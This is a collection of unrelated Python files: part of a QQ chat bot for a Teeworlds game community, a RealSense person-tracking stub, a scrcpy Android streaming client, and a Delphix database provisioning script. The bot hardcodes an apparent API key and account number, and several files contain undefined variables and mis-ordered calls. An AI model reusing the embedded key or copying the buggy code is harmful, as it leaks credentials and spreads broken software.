player_list_temp = []
for servers_info in servers_info_list:
if servers_info['players']:
for player_info in servers_info['players']:
player_list_temp.append(player_info['name'].decode())
lock.acquire()
try:
players_list = player_list_temp
print("get data successfully")
#print(players_list)
finally:
lock.release()
pass
time.sleep(30)
def sendMessageOnline():
while True:
time.sleep(2)
#print (friendDict)
#print (players_list)
for qqNickName in friendDict:
for friend in friendDict[qqNickName]:
if friend[0] in players_list:
if friend[1] == 0:
last_players_list = players_list
myQQId = bot.List('buddy', qqNickName)[0]
#print(myQQId)
bot.SendTo(myQQId, "你的好友{}上线了。".format(friend[0]))
friend[1] = 1
else:
pass
else:
if friend[1] == 1:
bot.SendTo(myQQId, "你的好友{}下线了。".format(friend[0]))
friend[1] = 0
def sendMessageReply():
while True:
time.sleep(2)
# this line always blocks the process
fromType, groupNumber, fromNumber, content = bot.poll()
print (fromType, groupNumber, fromNumber, content)
keywordInContent = False
if groupNumber == mainGroup.uin:
sendtoGroup = mainGroup
print("来自主群的消息")
isChatGroup = False
elif groupNumber == chatGroup.uin:
sendtoGroup = chatGroup
print("来自闲聊群的消息")
isChatGroup = True
#这里改为你的ID
if "大家好" in content:
bot.SendTo(sendtoGroup, "欢迎新人~如果有什么游戏相关的问题可以带上问号“?”并且@我向我提问~")
if "help" in content:
bot.SendTo(sendtoGroup, "如果有什么游戏相关的问题,可以用包含关键词和问号“?”的句子并且@我向我提问~项目地址:https://github.com/QingGo/ddnetQQbot")
if "@brainfullyTEE" in content:
print ("@我的消息")
if "player" in content:
if len(players_list) == 0:
sendStr = "目前没人在线."
else:
sendStr = ("目前在线玩家数为{},分别为:".format(len(players_list))) + (", ".join(players_list))
bot.SendTo(sendtoGroup, sendStr)
elif "?" in content or "?" in content:
for keyword in replyDict:
if keyword.lower() in content.lower():
bot.SendTo(sendtoGroup, replyDict[keyword])
keywordInContent = True
if not keywordInContent:
bot.SendTo(sendtoGroup, "不好意思,你所说的关键词尚未收录。快去https://github.com/QingGo/ddnetQQbot 贡献词库吧。如果要进行普通对话请不要带问号。")
else:
if isChatGroup:
requestJson["info"] = content.replace("@brainfullyTEE ","")
requestJson["userid"] = fromNumber
respone = requests.post(chatAPI, requestJson)
responeContent = json.loads(respone.text)
bot.SendTo(sendtoGroup, responeContent["text"]+responeContent.get("url", ""))
else:
bot.SendTo(sendtoGroup, "询问关键词的话请加上问号")
#-u参数表示使用某用户的设置文件登录
#这里需要更改qqbot的设置文件~/.qqbot-tmp/v2.3.conf?
#参考qqbot项目的说明
print("test get server info")
print(last_players_list)
bot.Login(['-u', '2143738142'])
#这里改为你的群名
mainGroup = bot.List('group', 'TeeWorlds中国社区')[0] #2960233702
print("mainGroup.uin: ", mainGroup.uin)
chatGroup = bot.List('group', 'Teeworlds闲聊群')[0] #1516349281
print("chatGroup.uin: ",chatGroup.uin)
isChatGroup = False
#读取词典
replyFile = "autoReply.txt"
replyDict = {}
with open(replyFile, 'r') as f:
spamreader = csv.reader(f, delimiter=',')
for row in spamreader:
if not row:
continue
if row[0].startswith('#'):
print(row)
else:
replyDict[row[0]] = row[1]
#读取好友列表
friendFile = "friendList.txt"
friendDict = {}
with open(friendFile, 'r') as f:
spamreader = csv.reader(f, delimiter=',')
for row in spamreader:
if not row:
continue
if row[0].startswith('#'):
print(row)
else:
friendDict[row[0]] =list(map(list, zip(row[1:],([0]*len(row[1:])))))
#图灵机器人平台的API
chatAPI = "http://www.tuling123.com/openapi/api"
requestJson = {"key": "692b5c941e7a43e2be89b1047b605049","info": "", "userid":""}
print(bot.List('buddy'))
#无限轮询消息并作出相应回应
'''
info_process = Process(target=get_servers_info)
send_message_online = Process(target=sendMessageOnline)
send_message_reply = Process(target=sendMessageReply)
'''
info_process = threading.Thread(target=get_servers_info)
send_message_online = threading.Thread(target=sendMessageOnline)
send_message_reply = threading.Thread(target=sendMessageReply)
info_process.start()
send_message_online.start()
send_message_reply.start()
|
PersonTracking.py
|
#Algorithm to use RealSense D435 to extract person from background
from threading import Thread
import pyrealsense2 as rs
import numpy as np
import cv2
import time
import Queue
#Define class to store image data
class realsense_image(object):
def __init__(self, depth_image, color_image):
self.depth = depth_image
self.color = color_image
#start __main__
# Configure depth and color streams
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 15)
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 15)
# Start streaming
profile = pipeline.start(config)
# Getting the depth sensor's depth scale (see rs-align example for explanation)
depth_sensor = profile.get_device().first_depth_sensor()
depth_scale = depth_sensor.get_depth_scale()
print("Depth Scale is: " , depth_scale)
# Create an align object
# rs.align allows us to perform alignment of depth frames to others frames
# The "align_to" is the stream type to which we plan to align depth frames.
align_to = rs.stream.color
align = rs.align(align_to)
#Set up buffer queue at 2 queues
q = Queue.Queue(2)
#Start the thread to read frames from the video stream
iscapture = True
realsense_capture_thread = Thread(target=RealSenseCapture, args=(iscapture,))
realsense_capture_thread.start()
#---------------------------------------------------------------------------------------
#end __main__
def ProcessDepthGrayscale(iscapture):
try:
#Read image data from queue
data = q.get()
finally:
pass
def RealSenseCapture(iscapture):
try:
while iscapture:
# Wait for a coherent pair of frames: depth and color
frames = pipeline.wait_for_frames()
# Align the depth frame to color frame
aligned_frames = align.process(frames)
# Get aligned frames
depth_frame = aligned_frames.get_depth_frame().as_depth_frame() # aligned_depth_frame is a 640x480 depth image
color_frame = aligned_frames.get_color_frame()
if not depth_frame or not color_frame:
continue
# Convert images to numpy arrays
depth_image = np.asanyarray(depth_frame.get_data())
color_image = np.asanyarray(color_frame.get_data())
if not q.full():
#Put image data to queue, when slot is empty
q.put(data)
else:
#Take previous data out
discard_data = q.get_nowait()
#Put new data into queue
q.put(data)
finally:
# Stop streaming
pipeline.stop()
print("RealSense capture closed...")
|
core.py
|
import os
import socket
import struct
import threading
import time
from io import BufferedIOBase, BytesIO
from time import sleep
from typing import Any, Callable, Optional, Tuple, Union
import av
import cv2
import numpy as np
from adbutils import AdbDevice, AdbError, Network, _AdbStreamConnection, adb
from av.codec import CodecContext
from .const import EVENT_FRAME, EVENT_INIT, LOCK_SCREEN_ORIENTATION_UNLOCKED
from .control import ControlSender
class Client:
def __init__(
self,
device: Optional[Union[AdbDevice, str, any]] = None,
max_width: int = 0,
bitrate: int = 8000000,
max_fps: int = 0,
flip: bool = False,
block_frame: bool = False,
stay_awake: bool = False,
lock_screen_orientation: int = LOCK_SCREEN_ORIENTATION_UNLOCKED,
connection_timeout: int = 3000,
):
"""
Create a scrcpy client, this client won't be started until you call the start function
Args:
device: Android device, select first one if none, from serial if str
max_width: frame width that will be broadcast from android server
bitrate: bitrate
max_fps: maximum fps, 0 means not limited (supported after android 10)
flip: flip the video
block_frame: only return nonempty frames, may block cv2 render thread
stay_awake: keep Android device awake
lock_screen_orientation: lock screen orientation, LOCK_SCREEN_ORIENTATION_*
connection_timeout: timeout for connection, unit is ms
"""
if device is None:
device = adb.device_list()[0]
elif isinstance(device, str):
device = adb.device(serial=device)
self.device = device
self.listeners = dict(frame=[], init=[])
# User accessible
self.last_frame: Optional[np.ndarray] = None
self.resolution: Optional[Tuple[int, int]] = None
self.device_name: Optional[str] = None
self.control = ControlSender(self)
# Params
self.flip = flip
self.max_width = max_width
self.bitrate = bitrate
self.max_fps = max_fps
self.block_frame = block_frame
self.stay_awake = stay_awake
self.lock_screen_orientation = lock_screen_orientation
self.connection_timeout = connection_timeout
# Need to destroy
self.alive = False
self.__server_stream: Optional[_AdbStreamConnection] = None
self.__video_socket: Optional[socket.socket] = None
self.control_socket: Optional[socket.socket] = None
self.control_socket_lock = threading.Lock()
def __init_server_connection(self) -> None:
"""
Connect to android server, there will be two sockets, video and control socket.
This method will set: video_socket, control_socket, resolution variables
"""
for _ in range(self.connection_timeout // 100):
try:
self.__video_socket = self.device.create_connection(
Network.LOCAL_ABSTRACT, "scrcpy"
)
break
except AdbError:
sleep(0.1)
pass
else:
raise ConnectionError("Failed to connect scrcpy-server after 3 seconds")
dummy_byte = self.__video_socket.recv(1)
if not len(dummy_byte) or dummy_byte != b"\x00":
raise ConnectionError("Did not receive Dummy Byte!")
self.control_socket = self.device.create_connection(
Network.LOCAL_ABSTRACT, "scrcpy"
)
self.device_name = self.__video_socket.recv(64).decode("utf-8").rstrip("\x00")
if not len(self.device_name):
raise ConnectionError("Did not receive Device Name!")
res = self.__video_socket.recv(4)
self.resolution = struct.unpack(">HH", res)
self.__video_socket.setblocking(False)
def __deploy_server(self) -> None:
"""
Deploy server to android device
"""
server_root = os.path.abspath(os.path.dirname(__file__))
server_file_path = server_root + "/scrcpy-server.jar"
self.device.push(server_file_path, "/data/local/tmp/")
self.__server_stream: _AdbStreamConnection = self.device.shell(
[
"CLASSPATH=/data/local/tmp/scrcpy-server.jar",
"app_process",
"/",
"com.genymobile.scrcpy.Server",
"1.20", # Scrcpy server version
"info", # Log level: info, verbose...
f"{self.max_width}", # Max screen width (long side)
f"{self.bitrate}", # Bitrate of video
f"{self.max_fps}", # Max frame per second
f"{self.lock_screen_orientation}", # Lock screen orientation: LOCK_SCREEN_ORIENTATION
"true", # Tunnel forward
"-", # Crop screen
"false", # Send frame rate to client
"true", # Control enabled
"0", # Display id
"false", # Show touches
"true" if self.stay_awake else "false", # Stay awake
"-", # Codec (video encoding) options
"-", # Encoder name
"false", # Power off screen after server closed
],
stream=True,
)
# Wait for server to start
self.__server_stream.read(10)
def start(self, threaded: bool = False) -> None:
"""
Start listening video stream
Args:
threaded: Run stream loop in a different thread to avoid blocking
"""
assert self.alive is False
self.__deploy_server()
self.__init_server_connection()
self.alive = True
self.__send_to_listeners(EVENT_INIT)
if threaded:
threading.Thread(target=self.__stream_loop).start()
else:
self.__stream_loop()
def stop(self) -> None:
"""
Stop listening (both threaded and blocked)
"""
self.alive = False
if self.__server_stream is not None:
self.__server_stream.close()
if self.control_socket is not None:
self.control_socket.close()
if self.__video_socket is not None:
self.__video_socket.close()
def __stream_loop(self) -> None:
"""
Core loop for video parsing
"""
codec = CodecContext.create("h264", "r")
while self.alive:
try:
raw_h264 = self.__video_socket.recv(0x10000)
packets = codec.parse(raw_h264)
for packet in packets:
frames = codec.decode(packet)
for frame in frames:
frame = frame.to_ndarray(format="bgr24")
if self.flip:
frame = cv2.flip(frame, 1)
self.last_frame = frame
self.resolution = (frame.shape[1], frame.shape[0])
self.__send_to_listeners(EVENT_FRAME, frame)
except BlockingIOError:
time.sleep(0.01)
if not self.block_frame:
self.__send_to_listeners(EVENT_FRAME, None)
except OSError as e: # Socket Closed
if self.alive:
raise e
def add_listener(self, cls: str, listener: Callable[..., Any]) -> None:
"""
Add a video listener
Args:
cls: Listener category, support: init, frame
listener: A function to receive frame np.ndarray
"""
self.listeners[cls].append(listener)
def remove_listener(self, cls: str, listener: Callable[..., Any]) -> None:
"""
Remove a video listener
Args:
cls: Listener category, support: init, frame
listener: A function to receive frame np.ndarray
"""
self.listeners[cls].remove(listener)
def __send_to_listeners(self, cls: str, *args, **kwargs) -> None:
"""
Send event to listeners
Args:
cls: Listener type
*args: Other arguments
*kwargs: Other arguments
"""
for fun in self.listeners[cls]:
fun(*args, **kwargs)
|
dx_provision_vdb.py
|
#!/usr/bin/env python
# Adam Bowen - Apr 2016
# This script provisions a vdb or dSource
# Updated by Corey Brune Aug 2016
# --- Create vFiles VDB
# requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
# TODO:
# Refactor provisioning functions
# Documentation
"""Provision VDB's
Usage:
dx_provision_db.py --source <name> --target_grp <name> --target <name>
(--db <name> | --vfiles_path <path>) [--no_truncate_log]
(--environment <name> --type <type>) [ --envinst <name>]
[--template <name>] [--mapfile <file>]
[--timestamp_type <type>] [--timestamp <timepoint_semantic>]
[--timeflow <name>]
[--instname <sid>] [--mntpoint <path>] [--noopen]
[--uniqname <name>][--source_grp <name>]
[--engine <identifier> | --all]
[--vdb_restart <bool> ]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
[--postrefresh <name>] [--prerefresh <name>]
[--configure-clone <name>]
[--prerollback <name>] [--postrollback <name>]
dx_provision_db.py -h | --help | -v | --version
Provision VDB from a defined source on the defined target environment.
Examples:
dx_provision_vdb.py --engine landsharkengine --source_grp Sources --source "ASE pubs3 DB" --db vase --target testASE --target_grp Analytics --environment LINUXTARGET --type ase --envinst "LINUXTARGET"
dx_provision_vdb.py --source_grp Sources --source "Employee Oracle 11G DB" --instname autod --uniqname autoprod --db autoprod --target autoprod --target_grp Analytics --environment LINUXTARGET --type oracle --envinst "/u01/app/oracle/product/11.2.0/dbhome_1"
dx_provision_vdb.py --source_grp Sources --source "AdventureWorksLT2008R2" --db vAW --target testAW --target_grp Analytics --environment WINDOWSTARGET --type mssql --envinst MSSQLSERVER --all
dx_provision_vdb.py --source UF_Source --target appDataVDB --target_grp Untitled --environment LinuxTarget --type vfiles --vfiles_path /mnt/provision/appDataVDB --prerollback "/u01/app/oracle/product/scripts/PreRollback.sh" --postrollback "/u01/app/oracle/product/scripts/PostRollback.sh" --vdb_restart true
Options:
--source_grp <name> The group where the source resides.
--source <name> Name of the source object
--target_grp <name> The group into which Delphix will place the VDB.
--target <name> The unique name that you want to call this object
in Delphix
--db <name> The name you want to give the database (Oracle Only)
--vfiles_path <path> The full path on the Target server where Delphix
will provision the vFiles
--no_truncate_log Don't truncate log on checkpoint (ASE only)
--environment <name> The name of the Target environment in Delphix
--type <type> The type of VDB this is.
oracle | mssql | ase | vfiles
--prerefresh <name> Pre-Hook commands
--postrefresh <name> Post-Hook commands
--prerollback <name> Post-Hook commands
--postrollback <name> Post-Hook commands
--configure-clone <name> Configure Clone commands
--vdb_restart <bool> Either True or False. Default: False
--envinst <name> The identifier of the instance in Delphix.
ex. "/u01/app/oracle/product/11.2.0/dbhome_1"
ex. LINUXTARGET
--timeflow <name> Name of the timeflow from which you are provisioning
--timestamp_type <type> The type of timestamp you are specifying.
Acceptable Values: TIME, SNAPSHOT
[default: SNAPSHOT]
--timestamp <timepoint_semantic>
The Delphix semantic for the point in time from
which you want to provision your VDB.
Formats:
latest point in time or snapshot: LATEST
point in time: "YYYY-MM-DD HH24:MI:SS"
snapshot name: "@YYYY-MM-DDTHH24:MI:SS.ZZZ"
snapshot time from GUI: "YYYY-MM-DD HH24:MI"
[default: LATEST]
--template <name> Target VDB Template name (Oracle Only)
--mapfile <file> Target VDB mapping file (Oracle Only)
--instname <sid> Target VDB SID name (Oracle Only)
--uniqname <name> Target VDB db_unique_name (Oracle Only)
--mntpoint <path> Mount point for the VDB
[default: /mnt/provision]
--noopen Don't open database after provision (Oracle Only)
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_provision_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
import re
import signal
import sys
import time
import traceback
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0.delphix_engine import DelphixEngine
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import repository
from delphixpy.v1_8_0.web import snapshot
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web.database import template
from delphixpy.v1_8_0.web.vo import AppDataDirectSourceConfig
from delphixpy.v1_8_0.web.vo import AppDataProvisionParameters
from delphixpy.v1_8_0.web.vo import AppDataVirtualSource
from delphixpy.v1_8_0.web.vo import ASEDBContainer
from delphixpy.v1_8_0.web.vo import ASEInstanceConfig
from delphixpy.v1_8_0.web.vo import ASEProvisionParameters
from delphixpy.v1_8_0.web.vo import ASESIConfig
from delphixpy.v1_8_0.web.vo import ASEVirtualSource
from delphixpy.v1_8_0.web.vo import MSSqlDatabaseContainer
from delphixpy.v1_8_0.web.vo import MSSqlProvisionParameters
from delphixpy.v1_8_0.web.vo import MSSqlSIConfig
from delphixpy.v1_8_0.web.vo import MSSqlVirtualSource
from delphixpy.v1_8_0.web.vo import OracleDatabaseContainer
from delphixpy.v1_8_0.web.vo import OracleInstance
from delphixpy.v1_8_0.web.vo import OracleProvisionParameters
from delphixpy.v1_8_0.web.vo import OracleSIConfig
from delphixpy.v1_8_0.web.vo import OracleVirtualSource
from delphixpy.v1_8_0.web.vo import TimeflowPointLocation
from delphixpy.v1_8_0.web.vo import TimeflowPointSemantic
from delphixpy.v1_8_0.web.vo import TimeflowPointTimestamp
from delphixpy.v1_8_0.web.vo import VirtualSourceOperations
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxTimeflow import DxTimeflow
from lib.GetReferences import find_dbrepo
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
VERSION = "v.0.2.305"
def create_ase_vdb(
engine, server, jobs, vdb_group, vdb_name, environment_obj, container_obj
):
"""
Create a Sybase ASE VDB
"""
vdb_obj = find_database_by_name_and_group_name(
engine, server, vdb_group.name, vdb_name
)
if vdb_obj == None:
vdb_params = ASEProvisionParameters()
vdb_params.container = ASEDBContainer()
if arguments["--no_truncate_log"]:
vdb_params.truncate_log_on_checkpoint = False
else:
vdb_params.truncate_log_on_checkpoint = True
vdb_params.container.group = vdb_group.reference
vdb_params.container.name = vdb_name
vdb_params.source = ASEVirtualSource()
vdb_params.source_config = ASESIConfig()
vdb_params.source_config.database_name = arguments["--db"]
vdb_params.source_config.instance = ASEInstanceConfig()
vdb_params.source_config.instance.host = environment_obj.host
vdb_repo = find_dbrepo_by_environment_ref_and_name(
engine,
server,
"ASEInstance",
environment_obj.reference,
arguments["--envinst"],
)
vdb_params.source_config.repository = vdb_repo.reference
vdb_params.timeflow_point_parameters = set_timeflow_point(
engine, server, container_obj
)
vdb_params.timeflow_point_parameters.container = container_obj.reference
print_info("Provisioning " + vdb_name)
database.provision(server, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = server.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return server.last_job
else:
print_info(engine["hostname"] + ": " + vdb_name + " already exists.")
return vdb_obj.reference
def create_mssql_vdb(engine, jobs, vdb_group, vdb_name, environment_obj, container_obj):
"""
Create a MSSQL VDB
engine:
jobs:
vdb_group:
vdb_name,
environment_obj:
container_obj:
"""
vdb_obj = find_database_by_name_and_group_name(
engine, dx_session_obj.server_session, vdb_group.name, vdb_name
)
if vdb_obj == None:
vdb_params = MSSqlProvisionParameters()
vdb_params.container = MSSqlDatabaseContainer()
vdb_params.container.group = vdb_group.reference
vdb_params.container.name = vdb_name
vdb_params.source = MSSqlVirtualSource()
vdb_params.source.allow_auto_vdb_restart_on_host_reboot = False
vdb_params.source_config = MSSqlSIConfig()
vdb_params.source_config.database_name = arguments["--db"]
vdb_params.source_config.repository = find_dbrepo(
dx_session_obj.server_session,
"MSSqlInstance",
environment_obj.reference,
arguments["--envinst"],
).reference
vdb_params.timeflow_point_parameters = set_timeflow_point(
engine, dx_session_obj.server_session, container_obj
)
if not vdb_params.timeflow_point_parameters:
return
vdb_params.timeflow_point_parameters.container = container_obj.reference
print_info(engine["hostname"] + ":Provisioning " + vdb_name)
database.provision(dx_session_obj.server_session, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
print_info(engine["hostname"] + ": " + vdb_name + " already exists.")
return vdb_obj.reference
def create_vfiles_vdb(
engine,
jobs,
vfiles_group,
vfiles_name,
environment_obj,
container_obj,
pre_refresh=None,
post_refresh=None,
pre_rollback=None,
post_rollback=None,
configure_clone=None,
):
"""
Create a Vfiles VDB
"""
vfiles_obj = None
try:
vfiles_obj = find_obj_by_name(
dx_session_obj.server_session, database, vfiles_name
)
except DlpxException:
pass
if vfiles_obj is None:
vfiles_repo = find_repo_by_environment_ref(
engine, "Unstructured Files", environment_obj.reference
)
vfiles_params = AppDataProvisionParameters()
vfiles_params.source = AppDataVirtualSource()
vfiles_params.source_config = AppDataDirectSourceConfig()
vdb_restart_reobj = re.compile("true", re.IGNORECASE)
if vdb_restart_reobj.search(str(arguments["--vdb_restart"])):
vfiles_params.source.allow_auto_vdb_restart_on_host_reboot = True
elif vdb_restart_reobj.search(str(arguments["--vdb_restart"])) is None:
vfiles_params.source.allow_auto_vdb_restart_on_host_reboot = False
vfiles_params.container = {
"type": "AppDataContainer",
"group": vfiles_group.reference,
"name": vfiles_name,
}
vfiles_params.source_config.name = arguments["--target"]
vfiles_params.source_config.path = arguments["--vfiles_path"]
vfiles_params.source_config.environment_user = environment_obj.primary_user
vfiles_params.source_config.repository = vfiles_repo.reference
vfiles_params.source.parameters = {}
vfiles_params.source.name = vfiles_name
vfiles_params.source.name = vfiles_name
vfiles_params.source.operations = VirtualSourceOperations()
if pre_refresh:
vfiles_params.source.operations.pre_refresh = [
{"type": "RunCommandOnSourceOperation", "command": pre_refresh}
]
if post_refresh:
vfiles_params.source.operations.post_refresh = [
{"type": "RunCommandOnSourceOperation", "command": post_refresh}
]
if pre_rollback:
vfiles_params.source.operations.pre_rollback = [
{"type": "RunCommandOnSourceOperation", "command": pre_rollback}
]
if post_rollback:
vfiles_params.source.operations.post_rollback = [
{"type": "RunCommandOnSourceOperation", "command": post_rollback}
]
if configure_clone:
vfiles_params.source.operations.configure_clone = [
{"type": "RunCommandOnSourceOperation", "command": configure_clone}
]
if arguments["--timestamp_type"] is None:
vfiles_params.timeflow_point_parameters = {
"type": "TimeflowPointSemantic",
"container": container_obj.reference,
"location": "LATEST_POINT",
}
elif arguments["--timestamp_type"].upper() == "SNAPSHOT":
try:
dx_timeflow_obj = DxTimeflow(dx_session_obj.server_session)
dx_snap_params = dx_timeflow_obj.set_timeflow_point(
container_obj,
arguments["--timestamp_type"],
arguments["--timestamp"],
arguments["--timeflow"],
)
except RequestError as e:
raise DlpxException("Could not set the timeflow point:\n%s" % (e))
if dx_snap_params.type == "TimeflowPointSemantic":
vfiles_params.timeflow_point_parameters = {
"type": dx_snap_params.type,
"container": dx_snap_params.container,
"location": dx_snap_params.location,
}
elif dx_snap_params.type == "TimeflowPointTimestamp":
vfiles_params.timeflow_point_parameters = {
"type": dx_snap_params.type,
"timeflow": dx_snap_params.timeflow,
"timestamp": dx_snap_params.timestamp,
}
print_info("%s: Provisioning %s\n" % (engine["hostname"], vfiles_name))
try:
database.provision(dx_session_obj.server_session, vfiles_params)
except (JobError, RequestError, HttpError) as e:
raise DlpxException(
"\nERROR: Could not provision the database:" "\n%s" % (e)
)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
print_info(
"\nERROR %s: %s already exists. \n" % (engine["hostname"], vfiles_name)
)
return vfiles_obj.reference
def create_oracle_si_vdb(
engine,
jobs,
vdb_name,
vdb_group_obj,
environment_obj,
container_obj,
pre_refresh=None,
post_refresh=None,
pre_rollback=None,
post_rollback=None,
configure_clone=None,
):
"""
Create an Oracle SI VDB
"""
vdb_obj = None
try:
vdb_obj = find_obj_by_name(dx_session_obj.server_session, database, vdb_name)
except DlpxException:
pass
if vdb_obj == None:
vdb_params = OracleProvisionParameters()
vdb_params.open_resetlogs = True
if arguments["--noopen"]:
vdb_params.open_resetlogs = False
vdb_params.container = OracleDatabaseContainer()
vdb_params.container.group = vdb_group_obj.reference
vdb_params.container.name = vdb_name
vdb_params.source = OracleVirtualSource()
vdb_params.source.allow_auto_vdb_restart_on_host_reboot = False
if arguments["--instname"]:
inst_name = arguments["--instname"]
elif arguments["--instname"] == None:
inst_name = vdb_name
if arguments["--uniqname"]:
unique_name = arguments["--uniqname"]
elif arguments["--uniqname"] == None:
unique_name = vdb_name
if arguments["--db"]:
db = arguments["--db"]
elif arguments["--db"] == None:
db = vdb_name
vdb_params.source.mount_base = arguments["--mntpoint"]
if arguments["--mapfile"]:
vdb_params.source.file_mapping_rules = arguments["--mapfile"]
if arguments["--template"]:
template_obj = find_obj_by_name(
dx_session_obj.server_session,
database.template,
arguments["--template"],
)
vdb_params.source.config_template = template_obj.reference
vdb_params.source_config = OracleSIConfig()
vdb_params.source.operations = VirtualSourceOperations()
if pre_refresh:
vdb_params.source.operations.pre_refresh = [
{"type": "RunCommandOnSourceOperation", "command": pre_refresh}
]
if post_refresh:
vdb_params.source.operations.post_refresh = [
{"type": "RunCommandOnSourceOperation", "command": post_refresh}
]
if pre_rollback:
vdb_params.source.operations.pre_rollback = [
{"type": "RunCommandOnSourceOperation", "command": pre_rollback}
]
if post_rollback:
vdb_params.source.operations.post_rollback = [
{"type": "RunCommandOnSourceOperation", "command": post_rollback}
]
if configure_clone:
vdb_params.source.operations.configure_clone = [
{"type": "RunCommandOnSourceOperation", "command": configure_clone}
]
vdb_repo = find_dbrepo_by_environment_ref_and_install_path(
engine,
dx_session_obj.server_session,
"OracleInstall",
environment_obj.reference,
arguments["--envinst"],
)
vdb_params.source_config.database_name = db
vdb_params.source_config.unique_name = unique_name
vdb_params.source_config.instance = OracleInstance()
vdb_params.source_config.instance.instance_name = inst_name
vdb_params.source_config.instance.instance_number = 1
vdb_params.source_config.repository = vdb_repo.reference
dx_timeflow_obj = DxTimeflow(dx_session_obj.server_session)
vdb_params.timeflow_point_parameters = dx_timeflow_obj.set_timeflow_point(
container_obj, arguments["--timestamp_type"], arguments["--timestamp"]
)
print(vdb_params, "\n\n\n")
print_info(engine["hostname"] + ": Provisioning " + vdb_name)
database.provision(dx_session_obj.server_session, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
raise DlpxException(
"\nERROR: %s: %s alread exists\n" % (engine["hostname"], vdb_name)
)
def find_all_databases_by_group_name(
engine, server, group_name, exclude_js_container=False
):
"""
Easy way to quickly find databases by group name
"""
# First search groups for the name specified and return its reference
group_obj = find_obj_by_name(dx_session_obj.server_session, group, group_name)
if group_obj:
databases = database.get_all(
server,
group=group_obj.reference,
no_js_container_data_source=exclude_js_container,
)
return databases
def find_database_by_name_and_group_name(engine, server, group_name, database_name):
databases = find_all_databases_by_group_name(engine, server, group_name)
for each in databases:
if each.name == database_name:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(each.reference))
)
return each
print_info(
"%s unable to find %s in %s" % (engine["hostname"], database_name, group_name)
)
def find_dbrepo_by_environment_ref_and_install_path(
engine, server, install_type, f_environment_ref, f_install_path
):
"""
Function to find database repository objects by environment reference and
install path, and return the object's reference as a string
You might use this function to find Oracle and PostGreSQL database repos.
"""
print_debug(
"%s: Searching objects in the %s class for one with the "
"environment reference of %s and an install path of %s"
% (engine["hostname"], install_type, f_environment_ref, f_install_path),
debug,
)
for obj in repository.get_all(server, environment=f_environment_ref):
if install_type == "PgSQLInstall":
if obj.type == install_type and obj.installation_path == f_install_path:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
elif install_type == "OracleInstall":
if obj.type == install_type and obj.installation_home == f_install_path:
print_debug(
"%s: Fount a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
else:
raise DlpxException(
"%s: No Repo match found for type %s.\n"
% (engine["hostname"], install_type)
)
def find_repo_by_environment_ref(
engine, repo_type, f_environment_ref, f_install_path=None
):
"""
Function to find unstructured file repository objects by environment
reference and name, and return the object's reference as a string
You might use this function to find Unstructured File repos.
"""
print_debug(
"\n%s: Searching objects in the %s class for one with the"
"environment reference of %s\n"
% (engine["hostname"], repo_type, f_environment_ref),
debug,
)
obj_ref = ""
all_objs = repository.get_all(
dx_session_obj.server_session, environment=f_environment_ref
)
for obj in all_objs:
if obj.name == repo_type:
print_debug(engine["hostname"] + ": Found a match " + str(obj.reference))
return obj
elif obj.type == repo_type:
print_debug(
"%s Found a match %s" % (engine["hostname"], str(obj.reference)), debug
)
return obj
raise DlpxException(
"%s: No Repo match found for type %s\n" % (engine["hostname"], repo_type)
)
def find_dbrepo_by_environment_ref_and_name(
engine, repo_type, f_environment_ref, f_name
):
"""
Function to find database repository objects by environment reference and
name, and return the object's reference as a string
You might use this function to find MSSQL database repos.
"""
print_debug(
"%s: Searching objects in the %s class for one with the "
"environment reference of %s and a name of %s."
% (engine["hostname"], repo_type, f_environment_ref, f_name),
debug,
)
obj_ref = ""
all_objs = repository.get_all(server, environment=f_environment_ref)
for obj in all_objs:
if repo_type == "MSSqlInstance" or repo_type == "ASEInstance":
if obj.type == repo_type and obj.name == f_name:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
elif repo_type == "Unstructured Files":
if obj.value == install_type:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
raise DlpxException(
"%s: No Repo match found for type %s\n" % (engine["hostname"], repo_type)
)
def find_snapshot_by_database_and_name(engine, database_obj, snap_name):
"""
Find snapshots by database and name. Return snapshot reference.
engine: Dictionary of engines from config file.
database_obj: Database object to find the snapshot against
